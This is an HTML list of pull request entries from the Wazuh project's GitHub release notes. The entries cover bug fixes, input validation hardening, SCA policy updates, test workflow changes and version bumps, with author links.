<li>Improve tmp_file path validation in cluster DAPI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486930454" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36246" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36246/hovercard" href="https://github.com/wazuh/wazuh/pull/36246">#36246</a></li>
<li>Revert bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495350373" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36303" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36303/hovercard" href="https://github.com/wazuh/wazuh/pull/36303">#36303</a></li>
<li>Bump 4.14.7 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496470145" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36312" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36312/hovercard" href="https://github.com/wazuh/wazuh/pull/36312">#36312</a></li>
<li>Serialize procps access to prevent modulesd crash by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4489581046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36261" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36261/hovercard" href="https://github.com/wazuh/wazuh/pull/36261">#36261</a></li>
<li>Remove obsolete configuration blocks from API upload_configuration setting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487498848" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36252" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36252/hovercard" href="https://github.com/wazuh/wazuh/pull/36252">#36252</a></li>
<li>Restore working vulnerability scanner database workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502088595" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36332/hovercard" href="https://github.com/wazuh/wazuh/pull/36332">#36332</a></li>
<li>Propagate agent merged_sum after hot reload in cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468736412" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36164" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36164/hovercard" href="https://github.com/wazuh/wazuh/pull/36164">#36164</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501542567" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36331" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36331/hovercard" href="https://github.com/wazuh/wazuh/pull/36331">#36331</a></li>
<li>Authd tier 0-1 flaky tests fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504446587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36342/hovercard" href="https://github.com/wazuh/wazuh/pull/36342">#36342</a></li>
<li>Review agent info logs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485038079" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36234" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36234/hovercard" href="https://github.com/wazuh/wazuh/pull/36234">#36234</a></li>
<li>Fix the wazuh-manager-modules crash that occurs while downloading the feed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503648565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36337" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36337/hovercard" href="https://github.com/wazuh/wazuh/pull/36337">#36337</a></li>
<li>Migrate FIM DB path queries to parameterized statements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4517817292" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36399" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36399/hovercard" href="https://github.com/wazuh/wazuh/pull/36399">#36399</a></li>
<li>Fix AlmaLinux 9/10 bootloader permissions SCA check regex and optional file handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515333133" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36396" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36396/hovercard" href="https://github.com/wazuh/wazuh/pull/36396">#36396</a></li>
<li>Cluster file processing parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494129534" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36296" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36296/hovercard" href="https://github.com/wazuh/wazuh/pull/36296">#36296</a></li>
<li>Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523024537" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36407" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36407/hovercard" href="https://github.com/wazuh/wazuh/pull/36407">#36407</a></li>
<li>Treat the absence of the hash document as expected, not an error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505113598" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36355" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36355/hovercard" href="https://github.com/wazuh/wazuh/pull/36355">#36355</a></li>
<li>geo_point validation support all compatible formats by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423592068" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36034" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36034/hovercard" href="https://github.com/wazuh/wazuh/pull/36034">#36034</a></li>
<li>Prevent Syscollector and SCA use-after-free on modulesd shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505494861" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36359" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36359/hovercard" href="https://github.com/wazuh/wazuh/pull/36359">#36359</a></li>
<li>Add cluster security model and configuration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522930141" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36405" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36405/hovercard" href="https://github.com/wazuh/wazuh/pull/36405">#36405</a></li>
<li>Bump CB_SCAN_STARTED timeout and trigger ITs on wm_syscollector.c by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4527847069" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36446" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36446/hovercard" href="https://github.com/wazuh/wazuh/pull/36446">#36446</a></li>
<li>Fixed an issue in eBPF with LSM hooks and improved the health check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359560869" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35838" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35838/hovercard" href="https://github.com/wazuh/wazuh/pull/35838">#35838</a></li>
<li>Validate cluster node name format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531591190" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36460" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36460/hovercard" href="https://github.com/wazuh/wazuh/pull/36460">#36460</a></li>
<li>eBPF libraries updated by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533955405" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36467" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36467/hovercard" href="https://github.com/wazuh/wazuh/pull/36467">#36467</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539082172" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36517" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36517/hovercard" href="https://github.com/wazuh/wazuh/pull/36517">#36517</a></li>
<li>Revert "Bump 4.14.6 branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539251322" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36519" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36519/hovercard" href="https://github.com/wazuh/wazuh/pull/36519">#36519</a></li>
<li>Update changelog for 4.14.6 RC 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539470693" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36562" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36562/hovercard" href="https://github.com/wazuh/wazuh/pull/36562">#36562</a></li>
<li>Fix policy evaluation errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528195977" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36449" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36449/hovercard" href="https://github.com/wazuh/wazuh/pull/36449">#36449</a></li>
<li>Release startup hash gate when the reload chain fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495215383" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36302" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36302/hovercard" href="https://github.com/wazuh/wazuh/pull/36302">#36302</a></li>
<li>Revert "Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541090106" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36591" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36591/hovercard" href="https://github.com/wazuh/wazuh/pull/36591">#36591</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546876084" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36624" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36624/hovercard" href="https://github.com/wazuh/wazuh/pull/36624">#36624</a></li>
<li>Restore event counter and classify received messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531260982" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36456" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36456/hovercard" href="https://github.com/wazuh/wazuh/pull/36456">#36456</a></li>
<li>Unify manager integration tests workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485169588" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36235" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36235/hovercard" href="https://github.com/wazuh/wazuh/pull/36235">#36235</a></li>
<li>Remove unused Node.js 12 from arm64 deb agent builder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467836275" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36156" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36156/hovercard" href="https://github.com/wazuh/wazuh/pull/36156">#36156</a></li>
<li>Remove unused Node.js 12 from arm deb agent builders (4.14.7) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467837119" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36157" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36157/hovercard" href="https://github.com/wazuh/wazuh/pull/36157">#36157</a></li>
<li>SCA typo bug in SELinux SCA rule for CentOS 8/9/10 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514754415" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36361/hovercard" href="https://github.com/wazuh/wazuh/pull/36361">#36361</a></li>
<li>Fix <code>detect-changes</code> glob to honour <code>**</code> recursively and extract logic into a reusable action by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544605284" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36617" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36617/hovercard" href="https://github.com/wazuh/wazuh/pull/36617">#36617</a></li>
<li>Merge merge-4.14.6-into-4.14.7 into 4.14.7 [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546868343" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36623" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36623/hovercard" href="https://github.com/wazuh/wazuh/pull/36623">#36623</a></li>
<li>Reduce log noise when engine has no synchronized ruleset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505198128" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36356" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36356/hovercard" href="https://github.com/wazuh/wazuh/pull/36356">#36356</a></li>
<li>Update test modules paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549542116" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36668" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36668/hovercard" href="https://github.com/wazuh/wazuh/pull/36668">#36668</a></li>
<li>Only download external deps when required by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486894083" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36244" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36244/hovercard" href="https://github.com/wazuh/wazuh/pull/36244">#36244</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4548874786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36664" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36664/hovercard" href="https://github.com/wazuh/wazuh/pull/36664">#36664</a></li>
<li>Mail forwarding and reporting 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li>Added Ubuntu 26.04's SCA policy in the SPECS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562694437" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36712" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36712/hovercard" href="https://github.com/wazuh/wazuh/pull/36712">#36712</a></li>
<li>Preliminary support new OSs - Ubuntu 26.04 - Add SCA content by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AwwalQuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AwwalQuan">@AwwalQuan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561732273" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36708" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36708/hovercard" href="https://github.com/wazuh/wazuh/pull/36708">#36708</a></li>
<li>Safeguards to inventory sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534767894" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36469" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36469/hovercard" href="https://github.com/wazuh/wazuh/pull/36469">#36469</a></li>
<li>Improve the method of detecting duplicates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504512576" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36344" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36344/hovercard" href="https://github.com/wazuh/wazuh/pull/36344">#36344</a></li>
<li>Fix race condition preventing inventory synchronization after agent reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551769345" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36682" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36682/hovercard" href="https://github.com/wazuh/wazuh/pull/36682">#36682</a></li>
<li>Added API integration tests workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472493573" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36196" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36196/hovercard" href="https://github.com/wazuh/wazuh/pull/36196">#36196</a></li>
<li>Fix non-atomic write for <code>file_status.json</code> in logcollector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565514906" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36722" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36722/hovercard" href="https://github.com/wazuh/wazuh/pull/36722">#36722</a></li>
<li>Make agent-info shutdown waits interruptible by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4564093587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36719" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36719/hovercard" href="https://github.com/wazuh/wazuh/pull/36719">#36719</a></li>
<li>Validate IP address in ip-customblock active response by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570134407" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36730" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36730/hovercard" href="https://github.com/wazuh/wazuh/pull/36730">#36730</a></li>
<li>wazuh-agent remains active after uninstall on Fedora 44 / DNF5 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568853035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36727/hovercard" href="https://github.com/wazuh/wazuh/pull/36727">#36727</a></li>
